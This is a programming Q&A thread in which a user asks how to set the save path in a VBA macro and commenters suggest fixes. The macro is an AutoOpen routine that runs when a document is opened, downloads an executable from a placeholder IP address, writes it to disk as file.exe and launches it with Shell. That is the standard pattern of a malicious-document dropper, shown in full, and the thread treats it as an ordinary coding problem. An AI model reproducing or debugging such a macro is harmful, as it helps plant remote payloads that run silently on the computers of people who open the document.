# How to download and save file to specific location from web server with VBA macro?

Tags: vba, libreoffice

I have a working code that downloads a file but it can only save it to current location (location with microsoft document). How could I specify the path? This is the code:

```
Sub AutoOpen()

Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "http://<IP>/<FILE>", False
xHttp.Send

With bStrm
    .Type = 1 
    .Open
    .write xHttp.responseBody
    .savetofile "file.exe", 2 
End With

Shell ("file.exe")

End Sub
```

I will appreciate your ideas

Comment: `.savetofile "C:\Test\file.exe", 2` for example

Comment: Thanks but that didn't work for me. I tried that one too.

Comment: “Didn’t work” isn’t telling us much.  Do you get an error?  On which line?

Comment: I'm so sorry for late reply. It's basic runtime error on line ".write xHttp.responseBody"

Comment: I'm using libreoffice.